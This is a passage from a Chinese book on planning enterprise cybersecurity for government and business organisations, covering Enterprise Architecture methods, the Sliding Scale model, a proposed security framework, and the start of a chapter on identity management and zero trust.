我们还可以汲取JARM中的多层级思路,将一个大型机构的信息化环境进行多层级的划分,在每个层级上结合整体的网络安全能力体系分类,以及组件化思维,形成更精细的、层次化的网络安全能力组件,从而指导政企机构的网络安全体系的设计与建设落地。 对于同样是复杂系统的网络安全建设问题,EA的基本思想与方法论同样适用。我们要做的是充分进行合理恰当的选取与应用,从全局视角,以系统性的方法进行整体的设计、建设与运行;应当综合考虑业务现状与信息化环境的未来发展,规划设计与之相匹配的网络安全能力体系,并像建设信息化一样,将网络安全的能力与信息化环境融合内生,全面覆盖,深度融合,从而保障政企核心业务的顺畅运行。 应用上述思路,我们可以形成一套全面的实用型框架,以及配套的方法论、工具集,从而为网络安全的建设模式升级提供方法与依据。本书后续章节将要介绍的“新一代企业网络安全框架”(以下简称“新框架”)就是结合网络安全、系统工程与项目管理,以及大量国内政企机构信息化与网络安全建设的实践经验,总结成一套适合于国内政企机构,特别是大中型政企机构信息化发展的、系统性的网络安全建设框架。新框架既是对网络安全模式升级新方法的探索,也是“内生安全”理念的有效落地。 新框架借鉴EA方法论,以“网络安全能力体系”建设为中心,识别出在信息化的各个层面,构成网络安全能力的能力组件,并将这些安全能力组件全面覆盖到政企普遍存在的信息化各领域,进而规划出网络安全建设实施“项目库”(需要逐步实施的项目的集合)。随着这些项目的实施,安全防护体系将逐步融入信息化环境,进而共同实现全面的安全能力。最终,随着安全技术体系与安全运行体系的建立与完善,可以实现“内生安全”的全面落地,使政企机构能够具备体系化的安全防御能力。 新框架必须重点设计所需安全能力之间的依赖协同关系,以及通过安全能力的协同所能提供给信息化的安全服务。要明确安全服务能力与信息化各层次的结合方式,建立以能力为中心的安全能力服务化模式。 新框架涉及的安全能力应全面覆盖云、终端、服务器、通信链路、网络设备、安全设备、工控、人员等IT要素,避免局部盲区而导致的防御体系失效;还需要将安全能力深度融入物理、网络、系统、应用、数据与用户等各个层次,确保安全能力在IT系统的各层次有效集成。 3.2.2 将当前需求与未来发展相结合 网络安全的零散化发展有一个重要的表现,就是根据漏洞位置进行修补,根据安全需求进行安全建设。但EA方法论告诉我们,系统建设的目标不仅仅是维护现存的技术体系,还应充分考虑企业未来状态及新型技术体系的引入,以此实现企业未来的战略目标和管理目标。将EA方法论用于网络安全,就要求我们在规划建设阶段,不能仅仅局限在服务于当前的业务系统和解决已知的网络安全问题,而是应当结合企业的业务与信息化发展,使网络安全建设能够服务于企业的战略目标和管理目标,敏捷应对未来的网络安全扩展需求。 这就要求企业在制定网络安全规划、实施网络安全建设的过程中,至少必须做到以下两点。 ● 所有的网络安全规划与建设应当在某种通用型的统一框架下进行,这样才能确保接口、协议、组件、模块等建设的标准化和可扩展性,尽可能减少或避免封闭式建设在安全扩展、商业替换及技术换代等方面给企业带来的高昂成本。 ● 企业需要明确自身网络安全建设所处的发展阶段,并结合自身的发展目标制定科学的发展规划。 如本书前文所述,政企机构的信息化建设,一般可以归纳为4个不同的发展阶段:分散建设阶段、统一建设阶段、集成应用阶段和共享应用阶段。而在网络安全领域,也有这样一个行业共识度较高的发展阶段模型,即滑动标尺模型。 网络安全滑动标尺(The Sliding Scale of Cyber Security)模型是SANS机构研究员Robert M. Lee在2015年8月发表的一份白皮书The Sliding Scale of Cyber Security中建立的一个网络安全的分析模型,是目前国内外公认度比较高的一个分析模型。该模型把网络安全的行动措施和资源投入进行了分类,使机构能够很方便地辨识自己所处的阶段,以及应该采取的措施和投入。对网络安全从业者来说,它可以帮助我们审视产品和服务的布局。 滑动标尺模型把机构的网络安全建设分为5个主要的阶段,分别为架构建设(Architecture)、被动防御(Passive Defense)、积极防御(Active Defense)、威胁情报(Intelligence)和进攻反制(Offense),如图3.5所示。 图3.5 网络安全的滑动标尺模型 这5个阶段对应5个逐步进化的能力。对于政企机构来说,为了使安全建设的投资更合理,回报率更高,应该按照滑动标尺从左向右的顺序进行建设。下面将滑动标尺模型给出的网络安全能力五大阶段进行简要说明。 1.架构建设 在系统规划、建设和维护的过程中,我们应该充分考虑安全要素,确保这些安全要素被设计到系统中,从而构建一个安全要素齐全的基础架构。 早期建设的很多信息系统,由于没有考虑架构安全问题,致使系统在投入运行后,需要不断地打“补丁”。但实际上,在绝大多数情况下,如果系统的设计架构不够安全,那么打再多的补丁也无济于事。 2.被动防御 被动防御的能力体系建立在架构安全的基础上,目的是在假设攻击者存在的前提下,保护系统的安全。被动防御可在没有人员介入的情况下,附加在系统架构之上,提供持续的威胁防御或威胁洞察力。 被动防御的目标也可以理解为“人不犯我,我不犯人”。当攻击发生时,系统会做出防御响应。但在响应之前,系统不会主动提前发现攻击者;而在响应之后,系统也不不力求捕获攻击者。从某种角度上来看,被动防御就像是给整个机构拉出了战场防御的“纵深”,并在阵地的不同层次、不同区域上进行层层设防。 3.积极防御 在积极防御的能力体系中,数据分析被充分利用,分析人员开始介入,形成人机互动,并对网络内的威胁进行监控、响应、学习和应用知识(理解)的过程。 与被动防御相比,积极防御将攻防过程从一次对一次,发展成一个有历史、有现在、有未来的长期过程;将攻击发生时的瞬间防御转换为日常的监测、分析和学习的过程;并且把对单次攻击本身的检测,延伸到对攻击者和攻击者行为的持续关注。在积极防御体系中,数据和人都是非常关键的。 4.威胁情报 安全建设需要收集数据,将数据转换为信息,并将信息生产加工为评估结果以填补已知知识的缺口。与积极防御相比,威胁情报阶段不但要收集和分析内部数据,而且还要使用外部数据,也就是威胁情报。威胁情报一般来自于外部机构或第三方机构,通常由网络安全服务商提供。威胁情报的产出能力、效率和质量,是现今网络安全服务商技术水平的核心标志之一。需要指出的是,在比较安全服务商的威胁情报能力时,不能只关注情报数量的多少,还需要考虑这些情报与机构自身所面临的安全威胁的结合程度是否紧密。 5.进攻反制 进攻反制是指在友好网络之外,对攻击者采取直接的压制或打击行动。按照国内网络安全的法律法规要求,对于一般的政企机构来说,进攻反制阶段所能做的,主要是借助于国家网络安全监管力量,通过法律手段对攻击者进行反击。 需要说明的是,滑动标尺模型上的不同能力组成并没有技术先进程度的优劣之分,这些能力对于一个完整有效的防御体系来说都是必要的。比如目前在全球网络安全技术领域都很热门的零信任技术体系,其实横跨了基础架构安全与被动防御的两个能力组成部分。而零信任与信息化环境结合的各类“执行点”,也分布在如网络、云计算环境、数据平台等各类纵深防御的防线当中。如果我们不能在基础架构安全中,很好地打通资产、漏洞、配置、补丁这四大关键流程,并在被动防御中有效地过滤各类威胁检测的安全数据“杂音”,则由“数据驱动”理念所进行的安全大数据分析与态势感知在积极防御阶段也无法有效地进行工作。 在后文将要介绍的新一代企业网络安全框架中,我们结合国内网络安全实践需要,将滑动标尺模型优化为政企机构需要叠加演进建设的4个安全能力,即基础结构安全、网络纵深防御、积极防御和威胁情报等能力。结合这4种安全能力,政企机构需要识别和设计构成网络安全防御体系的基础设施、平台、系统和工具集。 3.2.3 网络安全要与信息化深度融合 对于数字化系统来说,IT与业务是密不可分的。从EA方法论出发,网络安全也应当与信息化相融合,保障业务安全有序发展。 网络安全是保障业务安全与发展的重要因素,任何网络安全风险,最终都将导致不同程度的业务安全风险。事实上,数字化的业务系统复杂度越高,整个系统的不确定性就越高,其可能存在的网络安全漏洞与风险也就越大。 正因如此,新框架通过网络安全与信息化的技术聚合、数据聚合、人才聚合,为信息化环境各层面及运维开发等领域注入“安全基因”。企业网络安全体系的建设,可将EA方法论中关于复杂信息化体系的设计思想应用于网络安全领域,确保安全规划与建设能以全景视角、整体运行视角来审视网络安全能力体系建设,确保安全体系的建设以能力为导向,以架构为驱动,切实指导安全工作的开展。 在安全体系规划建设中,借鉴EA方法论中关于信息化复杂体系的设计思想来设计网络安全,使安全能力全面覆盖信息化的各个方面,且安全建设需要各个领域相互协同、整体联动,同时使安全与信息化融为一体,成为信息化运行的一部分。政企网络安全体系规划与建设应以保护信息化资产为基础,进一步关注人员、系统、数据以及运行支撑体系之间的交互关系,进行整体防护。 需要面向叠加演进的基础结构安全、网络纵深防御、积极防御和威胁情报等能力,识别、设计构成网络安全防御体系的基础设施、平台、系统和工具集,并围绕可持续的实战化安全运行体系以数据驱动方式进行集成整合,从而构建出动态综合的网络安全防御体系。要避免以偏概全的传统模式,以全覆盖、层次化思路进行规划设计,以围绕网络的纵深防御体系为基础,进一步围绕数据确定防御重点,围绕人员开展实战化安全运行,规划建设动态综合的网络安全防御体系,使安全能力全面覆盖云、终端、服务器、通信链路、网络设备、安全设备、工控、人员等IT要素,避免局部盲区而导致的防御体系失效;还需要将安全能力深度融入物理、网络、系统、应用、数据与用户等各个层次,确保安全能力能在IT的各层次有效集成。 3.2.4 建设实战化的网络安全运行能力 EA方法论告诉我们,信息化系统的设计规划不能只考虑开发与建设,还必须考虑系统的运营和使用过程。从某种程度上说,一个没有运营的方案不是一个可行的方案;一个没有运营的框架不是一个完整的框架。 将EA的方法论落实在网络安全建设中,我们应当以“三同步”原则推进安全和信息化的“全面覆盖、深度融合”,建设网络安全基础设施和实战化运行能力,并围绕可持续的实战化安全运行体系以数据驱动方式进行集成整合,从而构建出动态综合的网络安全防御体系。 实战化安全运行能力的建设要求我们切实提升网络安全预防和响应水平。通过将安全工作中的大量隐性活动显性化、标准化、条令化,将安全政策要求全面落实到具体责任岗位的细致工作事项中。通过安全运行流程打通团队协作机制,以威胁情报为主线支撑安全运行,提升响应速度和预防水平。 此外,还应确保安全运行的弹性和可持续性。通过健全网络安全组织,明确岗位职责,建立人员能力素质模型和培训体系,形成安全组织常设化、建制化,确保安全运行的可持续性。通过建立层级化的日常工作、协同响应、应急处置机制,做到对任务事项、事件告警、情报预警、威胁线索等各个方面的管理闭环,面对突发威胁能快速触发响应措施,迅速、弹性恢复业务运转。 实战化安全运行能力要求我们做到有备无患。随着威胁向有组织的攻击发展,政企机构需要以可量化的方式识别能力上限和底线,需要打破“紧平衡”建设方式来规划、设计和建设网络安全体系。这就要求政企机构在进行规划与设计时,要充分考虑随时可能突发的网络安全威胁升级情况,坚持“宁可备而不用、备而少用,不可用而不备”的原则,在建设中预置可扩展的能力,在运行中预留出必要的应急资源,确保在面对网络空间重大不确定性风险时,数字化运营不会受到重大影响。 3.2.5 持续引入信息化与网络安全新技术 EA方法论指引我们在信息化的规划建设中,不仅应当使设计框架有能力为新技术的持续引入提供扩展支撑,同时还能随着技术环境的整体变化做出不断的调整。同样,内生安全思想指导下的新一代企业网络安全框架,也应当能够促进网络安全创新技术的持续引入与运用。 事实上,本书后文将要介绍的新框架,已经将可信、拟态、AI、CWPP、EDR、SOAR、自适应、零信任、SASE等各种安全创新技术融入到整体网络安全体系中,使网络安全防御的效率与效果持续提升。新框架为技术创新提供了“土壤”,使新技术的效能在体系化的网络安全环境得到充分发挥;反之,将新技术积极融入安全体系,使其成为体系不可获取的一部分,又能对整个体系的安全水平提高起到如虎添翼的作用。 具体说明如下。 ● 新框架应用可信计算技术,确保关键系统计算任务的逻辑组合不被篡改和破坏,在计算运算的同时进行可信防御,为网络与信息系统培育免疫能力。 ● 新框架应用拟态防御技术,针对关键系统建立起动态变化的多重并行协同防御能力,解决利用未知漏洞、未知后门等未知攻击的“防御难”问题。 ● 新框架以大数据分析、云计算、物联网为基础,将AI(Artificial Intelligence,人工智能)技术应用到复杂的业务环境下,使深度学习、自然语言处理、行为画像等能力得以充分发挥,对发现威胁入侵、识别异常行为、提高网络安全运行效率起到促进作用。 ● 新框架将CWPP(Cloud Workload Protection Platform,云工作负载保护平台)技术应用于云计算,实现各层安全能力与云资源环境的相互融合,解决混合云数据中心基础架构中服务器工作负载的独特保护要求。 ● 新框架以终端的一体化安全能力和数据资源为EDR(Endpoint Detection& Response,终端检测与响应)技术的资产发现、安全加固、威胁检测、响应处置、情报利用提供基础,促进终端安全与安全体系的整体协同。 ● 新框架以态势感知平台为支撑的实战化安全运行机制,在技术和流程层面为应用SOAR(Security Orchestration,Automation and Response,安全编排、自动化与响应)技术提供基础,支持安全运行人员更加高效准确地完成安全事件的分析、处理和处置工作,有效地发挥人防与技防融合提升的效果。 ● 新框架以大数据、人工智能、自动化、行为分析、威胁检测、安全防护、安全评估等技术,共同支撑“自适应安全”的落地,结合国内网络安全现状,拓展持续自适应风险与信任评估机制的应用。 ● 新框架采用零信任思想进行架构设计,进一步缩小攻击面,在夯实基础设施、应用系统安全的基础上,围绕“数字身份”建立最小化权限,基于属性的访问控制、动态细粒度授权等重要安全思想建立了安全与业务的双基础设施。 ● 新框架融入SASE(Secure Access Service Edge,安全访问服务边缘)思想,结合零信任、CARTA(Continuous Adaptive Risk and Trust Assessment,持续自适应风险与信任评估)等新技术,将安全策略尽可能靠近实体所在位置,消除安全能力异构,加强整体安全管控,提升防御效能。 此外,新框架还能有效促进网络安全行业的创新生态。通过建立实战化的安全运行,根据IT运维与开发的特点,将安全人员技能、经验与先进的安全技术相适配。以需求为牵引,促进网络安全技术的成果转化,使各种先进创新技术得到切实的应用。通过持续的安全运行输出安全价值,有效支撑网络安全的创新生态。 第4章 新一代网络安全框架 4.1 新一代网络安全框架的概述 新一代企业网络安全框架(见图4.1)为政企“十四五”网络安全规划、设计提供了思路与建议。该框架从“甲方视角、信息化视角、网络安全顶层视角”展现出政企网络安全体系全景,通过以能力为导向的网络安全体系设计方法,规划出面向“十四五”期间的建设实施项目库(重点工程与任务),并设计出将网络安全与信息化相融合的目标技术体系和目标运行体系,供政企参考借鉴。 该框架通过叠加演进的能力分类方法,形成面向政企信息化全领域的网络安全能力体系。政企机构可以结合自身情况,采用框架中包含的系统工程方法,对每个安全领域的安全能力进行组合,并重点设计能力间的逻辑关系以形成能力逻辑架构,规划出覆盖网安全领域的建设实施项目库。在规划周期内,项目库中的工程和任务依据路线图确定的时间开展可研、立项、建设。随着项目和任务的落地,政企将逐步建成目标技术体系架构与目标运行体系架构,体系化网络安全能力也将随之形成,从而实现保障数字化业务的目标。 政企可将新一代网络安全框架作为参考模板,然后结合自身情况,充分利用框架中包含的规划方法、工具、项目库、参考架构、规划模型,科学、严谨地规划出适合政企业务发展的新一代网络安全体系。 图4.1 新一代网络安全框架 4.2 新一代网络安全框架的主要组件 新一代网络安全框架由多个组件构成,这些组件可应用于政企网络安全规划的不同阶段,起到提升规划工作的效率和质量、控制规划关键点的重要作用。这些组件分别是网络安全能力体系、规划方法论与工具体系、能力化组件模型、建设实施项目库、政企机构网络安全技术部署参考架构、政企机构网络安全运行体系参考架构。 4.2.1 网络安全能力体系 网络安全能力体系是保障政企机构数字化业务所必需的网络安全能力的集合,只有政企机构具备了必需的安全能力,才能真正有效地保障数字化业务安全。框架中网络安全能力体系是结合国内外安全领域规范标准、最佳实践、新安全技术研究以及威胁框架,枚举保障政企机构数字化业务安全运行所需的能力集合。网络安全能力体系在规划设计时,借鉴了国际知名网络安全研究机构SANS提出的网络安全滑动标尺模型对安全能力进行分类,并结合了中国政企机构信息化普遍存在的安全领域,由此形成了叠加演进的能力体系。 网络安全能力体系包含五大类别安全能力(见图4.2),即基础结构安全(Architecture)、纵深防御(Defense in Depth)、态势感知与积极防御(SA&Active Defense)、威胁情报(Intelligence)和反制(Counter)。其中,基础结构安全、纵深防御、态势感知与积极防御、威胁情报这4类能力是一个完备的企业级网络空间安全防御体系所需要的,而反制能力主要由国家级网络安全防御体系提供。 图4.2 叠加演进的网络安全滑动标尺模式 从叠加演进的视角来看待网络安全防御能力体系,基础结构安全与纵深防御能力具有与信息基础设施“深度结合、全面覆盖”的综合防御特点,而积极防御与威胁情报能力则具有强调“掌握敌情、协同响应”的动态防御特点,并且这些能力之间存在紧密联系,且相互促进。 4.2.2 网络安全规划方法论与工具体系 网络安全规划方法论与工具体系是面向网络安全规划全周期的方法论以及各阶段所用到的工具。政企机构可使用框架中的安全规划方法论指导开展自身网络安全规划工作,使用网络安全规划工具开展访谈、调研、路线设计工作。 1.网络安全规划方法论 网络安全具有专业性强、复杂度高和涉及面广等特点。采用科学的规划方法论指导安全规划全周期的工作,能够对规划出的项目(工程和任务)的目标展望、资源要求、关键里程碑、可落地性、检验标准起到关键作用,确保规划项目的科学性、经济性、可控性以及结果的可达成性。将网络安全、系统工程、项目管理、服务管理等理论融入网络安全规划方法中,合理使用安全规划工具,可确保政企能够以完整、严谨、科学的方式将安全专业知识应用于规划建设全周期,使规划出的项目(工程和任务)适合政企机构。如图4.3所示的新一代网络安全体系框架的规划方法论,将规划过程划分为5步,分别是现状分析、安全战略规划、目标安全体系展望、项目规划与路线图设计、可研与立项。 图4.3 新一代网络安全体系框架的规划方法论 2.规划工具体系 网络安全规划工具的合理使用可以大幅提升规划效率、规划质量以及规划活动的标准化程度等。新一代网络安全框架包含一个高质量的工具体系,融合了网络安全、系统工程、项目管理等各领域的专业知识,其内容全面覆盖了国内外优秀实践、监管合规要求,以及经过案例证明切实可行的先进做法。合理使用这些工具,可以对规划起到事半功倍的作用。 新一代网络安全框架规划工具主要有现状调研问题模板、安全能力分析评价模型、组件化安全能力框架、安全建设路线图、安全项目规划纲要、项目投资概算模型、政企机构网络安全防御全景模型、政企机构网络安全协同联动模型等。 4.2.3 组件化安全能力框架 组件化安全能力框架是将网络安全能力映射成为可执行、可建设的网络安全能力组件的重要工具。使用该框架可保障数字化业务所必需的安全能力映射到安全能力组件。安全能力组件是安全能力的实现载体,包括安全机制、技术手段、安全系统、安全管理制度、安全责任等内容。在政企机构信息化的所有层面,将安全能力组件与信息化组件相结合,保证了安全能力对信息化的覆盖性与融合性。通过对安全组件的组合来定义要建设的项目,可清晰地表达项目的建设内容。 首先,使用网络安全滑动标尺模型对网络安全能力分类,结合网络安全专业知识,识别出保障数字化业务所需的安全能力全集;然后,结合政企机构的信息化范围,利用组件化安全能力框架,在信息化的各个层次识别出所有安全能力组件,科学、合理地将安全能力组合、归并,建立相互作用关系,形成各领域逻辑架构;最后,将安全能力分布到每一项建设工程和任务中,确保安全能力的可建设、可落地、可度量。在图4.4所示的案例中,通过组件化网络安全能力框架呈现出安全能力在信息化不同层次的安全控制方式,充分反映了安全能力深度结合的思想。 图4.4 组件化安全能力框架 4.2.4 建设实施项目库 项目是政企机构推行安全管理思想、强化安全管控、提升安全能力、打造安全文化的重要抓手。在安全规划中,项目设置的科学性、合理性、可落地性,是决定安全体系建设成效的关键因素。新一代网络安全框架使用能力导向的EA方法论,将政企的动态综合网络安全防御体系作为一个整体进行设计,并识别出15个构成子系统,进一步以系统工程的方式将这15个构成子系统作为巨系统进行设计。 我们面向这15个子系统设计了项目规划纲要。项目规划纲要是项目库的核心,它从项目建设与实施的视角出发,高度概括了本项目的目标、覆盖范围、预期效果、协同领域以及多个项目之间的互相作用关系,突出强调项目规划、可研、立项与设计阶段的关键要点。 政企机构在进行网络安全规划时,可参考项目规划纲要模板,根据政企现状规划项目,借鉴项目纲要的表达形式,向信息化领导和网络安全领导阐述项目的重要意义、必要性、建设内容、成果系统、建设范围、所需资源、作用效果、价值产出,以便获得高层支持,从而得到充分的资源配给和政策支持。在规划的全周期,政企参考项目规划纲要进行可研、立项、招标、初步设计、概要设计、建设和运行,明确项目执行中要严格控制的每个系统必须达到的预期能力、关键指标和协同关系,确保安全能力的完整性、体系性和可落地性,进而以一个可实现、一贯秉承的整体视角建设达成网络安全防御目标。 4.2.5 政企机构网络安全技术部署参考架构 政企机构网络安全技术部署参考架构是描述安全技术体系部署状态的参考架构,它以安全技术部署架构图的形式,全面表达了政企机构网络全景、信息化和网络安全的融合全景,以及安全能力组件全景,展示了网络安全能力内生于信息化环境的目标部署状态。政企机构可参考此技术部署参考架构,结合自身信息化现状,规划自己的网络安全技术部署架构。 4.2.6 政企机构网络安全运行体系参考架构 政企机构网络安全运行体系参考架构是描述安全运行体系的目标状态参考架构,它以安全运行体系参考架构图的形式,全面表达了政企机构网络安全、运维、开发之间的协同关系,展示了网络安全运行以及网络安全与信息化之间聚合、协同运行的目标状态。政企机构可参考此运行体系参考架构,结合自身信息化现状,规划自己的安全运行体系参考架构。 4.3 新一代网络安全框架的关键工具 新一代网络安全框架提供了政企机构网络安全防御全景模型、政企机构网络安全协同联动模型、政企机构网络安全项目规划纲要等关键工具。政企机构可利用这些工具开展网络安全规划工作。 4.3.1 政企机构网络安全防御全景模型 1.政企机构网络安全防御全景模型的基本概念 政企机构网络安全防御全景模型是一种描述安全技术能力目标建设状态的工具,在新一代网络安全框架中用于描绘通过实施“十大工程、五大任务”建设项目后,企业将会实现的网络安全技术部署参考架构。 全景模型能够从以下3个层面协助企业构建并描绘在开展网络安全规划与设计时所需要的全景状态: ● 能够帮助企业以信息化场景为基础立体有机地展示全量的信息化环境并作为网络安全规划设计的基础; ● 能够帮助企业全息展示信息化组件和网络安全组件在各类信息化环境中的不同存在形态和结合方式; ● 能够帮助企业全面描述多种网络安全组件共存或相互关联的组合方式,从而诠释内生安全理念,有效支撑企业对网络安全技术部署情况开展的整体性、覆盖性、冗余性和兼容性分析。 2.政企机构网络安全防御全景模型的作用 该模型旨在帮助企业描绘在企业信息化环境中融入内生安全能力的方式,可协助企业根据实际工作需要并结合信息化情况对其在应用系统、网络区域、基础设施或企业整体层面进行裁剪与定制,设计形成企业自身的网络安全技术部署架构,帮助企业展示其网络安全与信息化融合的目标状态。 4.3.2 政企机构网络安全协同联动模型 1.政企机构网络安全协同联动模型的基本概念 政企机构网络安全协同联动模型是一种描述安全技术能力目标运行状态的工具,在新一代网络安全框架中用于描绘通过实施“十大工程、五大任务”建设项目后,企业将会实现的网络安全运行体系参考架构。 企业的安全运行工作无法独立于信息化自行开展。企业不能脱离其信息化运维、开发、业务应用工作独立地设计安全运行业务,也不能忽视安全运行流程之间的关联关系来设计安全运行业务,否则会导致安全能力不能体系化协作运转,达不到预期的目标运行状态。 协同联动模型能够从以下3个层面协助构建并描绘企业的安全运行状态: ● 能够帮助企业设计并展示建设项目与建成的安全系统/平台之间的对应关系; ● 能够帮助企业设计并展示所建立的安全系统/平台之间的业务和数据流关系,体现安全系统之间的相互结合与协同状态; ● 能够帮助企业设计并展示安全系统/平台与IT运维管理、应用开发之间的集成关系,用于体现安全服务于信息化并存在于信息化中的状态,从而帮助企业全面展现建设项目实施后整体系统运行的全貌状态,体现安全系统之间的协同、网络安全运行与信息化运行的聚合。 2.政企机构网络安全系统联动模型的作用 该模型可以协助企业根据实际工作的需要并结合其信息化情况,在业务场景、安全流程、与IT业务的聚合关系等层面进行裁剪与定制,设计形成企业自身的网络安全运行体系架构,协助企业明确安全流程在信息化环境中的全景运行情况,呈现企业建设项目在建设完成后可集成、可运行的目标状态,以及确保该目标状态能有效保持所不可或缺的关系性、流程性和约束。 政企机构网络安全协同联动模型给出以企业IT基础设施及被保护对象为基础进行安全运行设计的方法。该模型能够协助企业准确描述IT基础设施及被保护对象在运行体系中的状态,包括数字化终端、企业网络、企业云平台及云平台管理系统、业务应用及开发平台、数据库、大数据平台、工控网络及工控系统等。 4.3.3 政企机构网络安全项目规划纲要 1.政企机构网络安全项目规划纲要的基本概念 政企机构网络安全防御建设项目规划纲要是一种描述建设落实网络安全规划所需的建设项目,并提供其所涉及的关键要素信息的工具。在新一代网络安全框架中,用于在建设实施项目库中承载“十大工程、五大任务”的项目,在网络安全规划工程中的项目规划阶段作为辅助支持模板帮助政企机构定义项目,在可研立项阶段起到关键要点框定和总体设计参考的作用,从而支撑政企机构分阶段开展项目建设,以实现网络安全技术部署架构及运行体系架构所展望的网络安全防御体系愿景。 建设项目规划纲要体现了系统工程设计成果的要点,能够作为模板、参考和经验库,帮助企业从项目建设角度清晰地发现相关要点,帮助企业更好地在安全规划、可研、立项、招标、初步设计、概要设计、建设和运行的各个阶段开展相关工作。 2.政企机构网络安全项目规划纲要的作用 项目规划纲要呈现了项目关键要素设计表述的形式。项目规划纲要针对每个工程/任务阐述该领域的背景、能力框架及建设要点,制定总体架构图,描述IT聚合点、工程参与方、建成系统等内容,形成该领域的背景概述、安全需求、建设目标、关键能力、建设要点、整体架构、交付成果等项目要素,形成直观可读、清晰可用的效果。 第3部分 怎样建设内生安全 第5章 新一代身份安全 第6章 重构企业级网络纵深防御 第7章 数字化终端及接入环境安全 第8章 面向云的数据中心安全防护 第9章 面向大数据应用的数据安全防护 第10章 面向实战化的全局态势感知体系 第11章 面向资产/漏洞/配置/补丁的系统安全 第12章 工业生产网安全防护 第13章 内部威胁防护体系 第14章 密码专项 第15章 实战化安全运行能力建设 第16章 安全人员能力支撑 第17章 应用安全能力支撑 第18章 物联网安全能力支撑 第19章 业务安全能力支撑 第5章 新一代身份安全 5.1 数字化转型与业务发展的新要求 5.1.1 数字化转型驱动身份安全改变 数字化转型促使系统集成与需求的激增,扩大了数据流转的范围,大数据、物联网、云计算、移动应用等技术改变了传统身份管理和使用的模式,“身份安全”从面向人员实体的身份安全管理演进为对数字身份(人员、设备、程序、接口等)的安全管理,管理模式也从功能驱动转变为数据驱动。基于零信任架构的现代身份管理与访问控制技术为信息系统和网络安全运营奠定了坚实基础。 5.1.2 传统身份安全面临的问题 政企机构在数字化转型的过程中,业务范围进一步向上下游延伸。以前只能在内网访问的大量业务向互联网开放,远程办公向常态化发展,基础设施全面向云化升级,各类信息化系统协同工作,数据在更大的业务范围内流转。这些数字化业务转型的举措在大幅降本增效的同时也导致了安全风险的剧增,对网络安全保障提出了更高的要求。传统身份安全在数字化转型中有诸多问题亟需解决,具体表现在以下方面。 ● 基础设施升级面临的身份安全管控挑战 数字化转型促使信息化基础设施全面升级,云计算、大数据、物联网、移动办公等新技术的应用产生了大量数字身份(设备、接口、程序),权限控制变得极其复杂。传统的身份管理与访问控制体系对数字身份的管理能力、权限管理能力、访问控制能力相对缺乏,存在巨大风险。 ● 接入人员和设备的多样性导致访问控制难度剧增 数字化转型促使政企业务进一步开放,接入网络的人员、设备越来越多样化,除了企业内部员工外,接入人员还包括供应商、外包人员、客户等外部人员。接入企业网的设备除办公终端外,还包括平板、手机等移动终端以及物联网设备。人员的复杂性、设备的多样性导致安全可控性降低,为业务引入了更多的攻击面。 ● 传统的网络边界隔离已凸显出不足 目前,绝大多数企业还是采用传统的网络分区和隔离的安全模型,随着业务数字化、网络化、智能化的趋势,数据必须在多样化的业务、平台、设备、用户之间流动,这导致企业网络安全边界越来越模糊,难以通过边界防护实现灵活、动态的访问控制需求。传统的安全边界防护思想在应对数字化业务带来的新挑战时凸显出不足。 ● 粗粒度权限达不到精细化访问控制要求 在传统的信息化业务环境下,用户身份相对单一,用户权限基本固定,用户操作局限于固定模式。随着数字化业务的开展,这种传统的身份管理与访问控制模式无法满足数字化身份对属性管理的需求,无法根据用户及其所处环境的风险状况以及所访问资源的属性动态调整用户权限,且控制粒度过粗,达不到精细化访问控制的要求。 ● 特权账号管控不力,导致大量危害性操作时有发生 在数字化业务环境下,业务与信息化深度融合催生了大量的特权业务场景,特权账号数量呈几何级数增长。在这种情况下,传统身份安全对特权账号及其操作的管控力度明显不足,由特权管理不当引发的违规操作、恶意操作或失误操作时有发生,这给企业业务运营造成了极大危害。 ● 集成度过低,难以适应大规模复杂场景的自动化身份管理需求 传统的身份安全缺乏自动化的身份管理与权限调整能力。在大型机构复杂的IT环境下,数字身份全生命周期管理、权限设置和访问控制都面临较大的挑战。当企业复杂的组织机构出现频繁的人员调整时,各级组织众多的身份数据与形态各异的业务系统难以应对自动化身份管理与账号权限变更的需求,无法在提高用户访问便利性的同时满足安全性的要求。 5.2 什么是新一代身份安全 5.2.1 基本概念 新一代身份安全是对与政企数字化业务的用户身份管理与访问控制相关的一系列能力组件的统称。它利用系统工程方法将身份管理与访问控制能力组件相互组合,构成协同联动的技术平台、运行管理流程和安全管理规范。 新一代身份安全的典型特征是以“数据驱动”的思想构建身份安全。在数字化场景下,新一代身份安全以泛化身份数据管理和资源属性管理为基石,采用基于属性的权限管理与访问控制技术路线,融入“零信任”安全理念设计访问控制体系,将数字身份同政企业务运行环境进行聚合,共同实现全场景数字化身份安全管理与访问控制能力。政企可以通过应用现代身份管理与访问控制技术为业务运营和网络安全奠定坚实基础,保障政企数字化业务的安全。 1.现代化身份管理 现代化身份管理聚合人员、设备、程序等数字身份,通过自动化的组织机构信息及账号信息同步机制,弥合各系统割裂的身份孤岛及身份数据的不一致性,实现不同类型的用户、用户多身份在企业多套组织机构下复杂的实体间关系。其范围覆盖用户管理、账号管理、认证管理、资源管理、策略管理、权限管理等管理能力,并通过内部数据总线和内部服务总线,以集成方式实现身份主数据、流程管理、基础服务、账号同步服务、安全集成服务等能力;通过外部集成总线实现对安全基础设施、第三方应用系统的集成。现代化身份管理框架如图5.1所示。 身份数据管理是实现现代化身份安全的基础,为实现多种权限管理模型及精细化的权限控制提供了必要的数据支撑。它通过多维属性数据描述主客体特征,通过ABAC、RBAC以及PBAC多种权限模型的有效结合,解决单一授权模型下角色与权限爆炸、用户授权机制不灵活、访问控制颗粒度过粗的问题。身份数据管理应支持访问者身份的属性管理、被访问数据的属性管理,可根据访问者属性、上下文、受访数据属性及访问控制策略提供访问决策。 现代化身份管理基于流程化、自动化的身份全周期管理以及匹配企业实际管理职责的多级权限体系,能有效提高企业管理水平,降低管理成本;通过深入应用集成,打通业务条线,提升业务敏捷性。 图5.1 现代化身份管理框架 2.架构的访问控制 零信任(Zero Trust)是一组不断发展的网络安全术语,不同版本的定义基于不同的维度进行描述。NIST在其发表的《零信任架构(草案)》中指出,零信任架构是一种保护网络、数据安全的端到端方法。与传统安全观念相比,零信任更加关注于资源的保护,而非网络边界的防护。零信任重点关注身份、凭证、访问管理、运营、终端、主机环境和互联的基础设施,首要目标是使安全可控的主体在合适的时间、地点,安全地访问应用与数据。它通过对泛化身份进行动态、细粒度的访问控制,来应对越来越严峻的越权横向移动风险。零信任架构是基于这一思想而开发出的一系列概念、方法和技术。 在《零信任网络》一书中,埃文·吉尔曼(Evan Gilman)和道格·巴斯(Doug Barth)将零信任的定义建立在以下5个基本假定条件上: ● 网络无时无刻不处于危险的环境中; ● 